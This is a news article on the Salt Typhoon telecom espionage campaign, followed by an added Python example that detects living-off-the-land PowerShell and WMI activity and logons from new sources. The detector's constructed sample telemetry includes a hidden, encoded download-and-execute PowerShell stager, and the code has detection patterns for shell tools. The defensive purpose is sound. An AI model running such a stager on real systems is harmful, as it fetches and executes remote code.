What Should the US Do About Salt Typhoon?
=========================================

[Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi)

April 10, 2025, 8 Min Read

Source: Daniren via Alamy Stock Photo

Of the countless threat actors, state-sponsored and otherwise, that target the US private and public sectors, few have gained the wide cultural relevance of Salt Typhoon, the Chinese state-sponsored threat actor that has targeted major telecommunications providers in a far-reaching, ongoing espionage campaign.

Discovered last fall, Salt Typhoon has hacked into telecom giants in the US and abroad, including Verizon, AT&T, Lumen Technologies, and others, in a successful effort to access [the ‘lawful intercept’ systems law enforcement agencies](https://www.darkreading.com/cyber-risk/salt-typhoon-apt-subverts-law-enforcement-wiretapping) use for court-authorized wiretapping. In its apparently months-long campaign, Salt Typhoon accessed sensitive data belonging to the Republican and Democratic 2024 presidential campaigns as well as that of other politicians.
Salt Typhoon’s activities have continued [into the new year](https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoon-exploits-cisco-devices-telco-infrastructure) and around the world. Although Chinese state-backed espionage against the US is well established, the telecom-focused attacks reported last fall are a high-profile reminder of how these activities are escalating. The question is, what can the US do about it?

Salt Typhoon: Truly an Advanced Threat
--------------------------------------

CrowdStrike’s recent 2025 ‘Global Threat Report’ said China state-backed hacking has [reached an ‘inflection point’](https://www.techtarget.com/searchsecurity/news/366619774/CrowdStrike-China-hacking-has-reached-inflection-point) and noted a [150% increase in China-nexus activity](https://go.crowdstrike.com/2025-global-threat-report.html) across all sectors. Beyond espionage, the Chinese government has also shown an interest in [pre-positioning itself in critical environments](https://www.darkreading.com/vulnerabilities-threats/china-s-volt-typhoon-apt-burrows-us-critical-infrastructure) to prepare for possible escalation with adversaries.

Aaron Shraberg, senior intelligence analyst at Flashpoint, tells Dark Reading that on top of the aforementioned espionage and pre-positioning activities, the group uses a number of sophisticated tactics. ‘Salt Typhoon has demonstrated stealth and persistence, meaning it is difficult to identify the threat on networks,’ Shraberg says.
‘The group has demonstrated proficiency in various tactics, techniques, and procedures (TTPs), like living off the land (LotL), to use legitimate tools and blend in with network traffic to avoid discovery.’

On April 2, the House Committee on Oversight and Government Reform [dedicated a hearing](https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoons-wake-congress-potential-options) to Salt Typhoon. During the hearing, Rep. William Timmons (R-SC), the committee chairman, asked Edward Amoroso, research professor at New York University, whether the US should retaliate for the Salt Typhoon attacks and what kind of response would be justified. Amoroso did not advocate ‘hacking back’ (the popular colloquial term for retaliatory offensive cyber activity), instead saying the US should see it as a wake-up call for the country to shore up its defenses and pull together. He said the idea of hacking back ‘shirks the responsibility’ to look inward.

Dark Reading asked four security experts about the US’s options for responding to Salt Typhoon, as well as how defenders should protect themselves against APT threats.

The Threat of Salt Typhoon
--------------------------

Asked how much of a threat Salt Typhoon’s malicious activities pose to the United States, the experts Dark Reading spoke with broadly attested to their significance.

Bobby Kuzma, director of offensive cyber operations at penetration testing and incident response firm ProCircular, says the activity Salt Typhoon engaged in was ‘pretty bad,’ noting the reach granted by leveraging the lawful intercept capabilities built into domestic telecommunications providers.

‘For every phone company and ISP (not that there’s much of a difference anymore) they have access to, they can intercept everything travelling over the network, including encrypted communications,’ Kuzma says.
‘They might not be able to read the content of those communications, but they can certainly look at patterns in who is talking to whom and make educated guesses.’

Dave Merkel, co-founder and CEO of managed security services vendor Expel, says it was a huge deal but, notably, nothing new. ‘China actively goes after US private sector organizations for a number of reasons, relating to counterintelligence, IP theft, you name it,’ he says.

To Merkel’s point, China’s cyber efforts are more or less institutionalized at this point. CrowdStrike, for example, [regularly discusses](https://www.crowdstrike.com/en-us/blog/liminal-panda-telecom-sector-threats/) how China’s Five-Year Plans should be read through a cyber-focused lens.

This activity doesn’t seem to be slowing down. Austin Berglas, global head of professional services at security vendor BlueVoyant and former head of cyber for the FBI in New York, says as much.

‘Chinese state-sponsored attacks against United States critical infrastructure will continue to occur,’ Berglas says. ‘China has been embedding themselves in networks and exploiting supply chains for the purpose of conducting massive data collection activities for years. This is nothing new to the intelligence community.’

He continues, ‘The fact that China is already embedded in US infrastructure is a massive concern.
Traditional goals such as intellectual property theft and large-scale intelligence collection pale in comparison to the potential for disruption or takeover of critical services.’

US Government Options for Response
----------------------------------

Kuzma lists the conventional levers: ‘strongly worded diplospeak,’ expelling members of diplomatic delegations, criminal charges against individual foreign citizens, and sanctions against organizations (which have [happened already](https://www.techtarget.com/searchsecurity/news/366618216/Treasury-Department-sanctions-company-tied-to-Salt-Typhoon)). ‘All these are so-called proportionate responses,’ he says. ‘It gets scarier from there.’

Alon Termin, red team expert at exposure management firm CYE, approached the question of possible responses from a more cyber-focused angle, namely shoring up defenses and imposing stronger regulations. ‘The US can respond with defensive cyber operations to detect, deter, and neutralize threats,’ Termin says. ‘Implementing stricter cybersecurity regulations for critical infrastructure sectors could also help prevent such intrusions.’

The FCC [proposed regulations last fall](https://docs.fcc.gov/public/attachments/DOC-408015A1.pdf) requiring communication providers to annually certify, update, and implement cybersecurity risk management plans.

How Should the US Respond to Salt Typhoon?
------------------------------------------

Much like Amoroso’s answer during the April 2 House Committee on Oversight and Government Reform hearing, sources broadly responded to the question of what the US government should do by calling for better security hygiene in its most critical institutions. Here’s what they said:

* Austin Berglas, BlueVoyant: Our response should be to finally get our own house in order so that we can properly protect the homeland. Private corporations need to learn lessons from failures within the US government. Permitting sensitive and business-related conversations [to be conducted on platforms outside of corporate approved networks and devices](https://www.darkreading.com/cybersecurity-operations/opsec-nightmare-leaking-us-military-plans-reporter) will only cause problems, and policies and procedures are only useful if enforced and followed. The FCC recently proposed to strengthen rules for telecom providers to secure their environment. This guidance is nothing without action and adoption. Lastly, our adversaries do not need to deploy sophisticated, zero-day exploits to have success. They are capitalizing on patchable, previously identified vulnerabilities. Basic hygiene calls for continuous and complete visibility across your network and monitoring of your most critical supply chain relationships.
* Alon Termin, CYE: The best way to respond is by investing in advanced cybersecurity technologies and practices to protect critical systems.
* Anne An, principal threat intelligence analyst, Trellix: I’d hope that the US government will prioritize the development and deployment of more secure edge devices, such as phones, laptops, and other IoT (Internet of Things) hardware, which are becoming an increasing point of vulnerability. They are often the first line of defense in a network, and as they are more widely used, they become targets for APTs.
* Bobby Kuzma, ProCircular: The US has already exerted pressure on China to make its displeasure known, through sanctions and individual criminal charges against MSS officers linked to the attacks. Another consideration that is on the table, but probably won’t be acted on, is allowing telecom organizations to shut down or remove the lawful intercept capability that acts as an effective backdoor into their infrastructure. There needs to be a balance between convenience to law enforcement for surveillance and having massive backdoors that allow for this exploitation.
Defender Takeaways From Salt Typhoon
------------------------------------

Although state-backed espionage may not be something every organization feels it has to worry about, the best practices for defending against an APT are generally good advice, no matter who you are.

Expel’s Merkel advises enforcing good cyber hygiene, such as patching quickly, supporting multifactor authentication, and maintaining good asset inventories. He calls this the ‘bare minimum,’ and suggests taking a defense-in-depth approach to security and prioritizing strong detection and response.

Flashpoint’s Shraberg, meanwhile, calls for enterprises to adopt a ‘proactive and layered security approach drawing on public and private sector resources and expertise.’

‘There are many ways to address the multifaceted nature of sophisticated threat actors. Technical defenses are very important and should be combined with a level of education of individuals to learn how to do their part to fend off attacks from things like phishing and social engineering, especially as AI tools now find their way into attackers’ toolboxes,’ Shraberg says. ‘Given the potential for supply chain compromises highlighted with other Chinese APT groups, enterprises should also assess and manage the security risks associated with their vendors and partners, such as those involving networking equipment like routers.’

An says that because Salt Typhoon typically uses otherwise legitimate tools like PowerShell and WMI, organizations should monitor for unusual or suspicious activity associated with living off the land, as well as for compromised accounts.

‘One of the group’s most common tactics is to use legitimate credentials and move laterally within the network, so organizations should follow strong monitoring practices to detect and respond to compromised accounts as quickly as possible,’ An says. ‘They can do this by implementing and enforcing multifactor authentication, conducting frequent audits, and regularly analyzing login behavior for any signs of irregular activity.’

Organizations should also patch public-facing services, VPNs, and legacy systems, which are common entry points for attackers.

Although a common impulse in the US right now is to handle China through escalation and retaliation, Dark Reading’s sources uniformly do not propose doing the same on the cyber front. Instead, as Amoroso put it at last week’s House committee hearing, ‘The best defense is a good defense.’
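The monitoring An describes, spotting living-off-the-land execution through PowerShell and WMI and catching logons from sources an account has never used, as an added example that is not part of the original article or of any vendor's product: Python detection logic run over a handful of constructed events. The field names follow Sysmon Event ID 1 (process creation) and Windows Security Event ID 4624 (logon) conventions, but the hosts, users, IP addresses, command lines and the "known sources" baseline are all made up for the example, and the rule names and the two-rule escalation threshold are this example's own choices, not something the article or its sources specify.

```python
"""Added example (not from the article): detect living-off-the-land execution
(obfuscated PowerShell, shells spawned via WMI) and logons from unexpected
sources, then escalate hosts/accounts where more than one rule fires."""
import base64
import re
from collections import defaultdict


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: every value below is invented for this example.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "WS-042", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"EventID": 1, "Host": "SRV-DB1", "User": "CORP\\svc_backup",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + encode_ps(STAGER)},
    {"EventID": 1, "Host": "SRV-DB1", "User": "CORP\\svc_backup",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c whoami /all"},
    {"EventID": 4624, "Host": "SRV-DB1", "User": "CORP\\svc_backup", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Host": "SRV-DB1", "User": "CORP\\svc_backup", "LogonType": 3, "IpAddress": "10.1.1.30"},
    {"EventID": 4624, "Host": "WS-042", "User": "CORP\\jdoe", "LogonType": 2, "IpAddress": "-"},
]

# Constructed baseline: the network sources each account has been seen from before.
KNOWN_SOURCES = {"CORP\\svc_backup": {"10.0.0.5"}, "CORP\\jdoe": set()}

# powershell.exe accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...).
_ENC_FLAGS = "|".join(re.escape("-" + "encodedcommand"[:n]) for n in range(1, 15))
_ENC_RE = re.compile(r"(?i)(?:^|\s)(?:-ec|" + _ENC_FLAGS + r")\s+([A-Za-z0-9+/=]{16,})")
_HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden\b")
_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_lotl(events):
    """Flag living-off-the-land execution: obfuscated PowerShell and shells spawned by WMI."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        cmd = ev["CommandLine"]
        decoded = decode_encoded_command(cmd)
        if image in ("powershell.exe", "pwsh.exe") and (decoded is not None or _HIDDEN_RE.search(cmd)):
            findings.append({"rule": "obfuscated_powershell", "host": ev["Host"],
                             "user": ev["User"], "detail": decoded or cmd})
        # WmiPrvSE.exe hosts WMI providers; it spawning a shell is how remote WMI execution lands.
        if parent == "wmiprvse.exe" and image in _SHELLS:
            findings.append({"rule": "wmi_spawned_shell", "host": ev["Host"],
                             "user": ev["User"], "detail": cmd})
    return findings


def detect_anomalous_logons(events, known_sources):
    """Flag network/RDP logons (types 3 and 10) from a source the account has not used before."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") not in (3, 10):
            continue
        if ev["IpAddress"] not in known_sources.get(ev["User"], set()):
            findings.append({"rule": "new_logon_source", "host": ev["Host"],
                             "user": ev["User"], "detail": ev["IpAddress"]})
    return findings


def analyze(events, known_sources):
    return detect_lotl(events) + detect_anomalous_logons(events, known_sources)


def prioritize(findings):
    """Escalate (host, user) pairs where more than one rule fired: LotL execution plus a
    new logon source for the same account is the credential-driven lateral movement pattern."""
    rules_by_key = defaultdict(set)
    for f in findings:
        rules_by_key[(f["host"], f["user"])].add(f["rule"])
    return sorted(k for k, rules in rules_by_key.items() if len(rules) >= 2)


if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS, KNOWN_SOURCES)
    for f in hits:
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['detail']}")
    print("escalate:", prioritize(hits))
```

Run against the sample, the ordinary interactive PowerShell on WS-042 produces nothing, while SRV-DB1 yields four findings for the backup service account and is the one pair escalated. The individual rules are deliberately noisy on their own (administrators do run encoded commands and WMI does spawn shells); the point is the correlation step, which is what turns a LotL signal into a compromised-account lead.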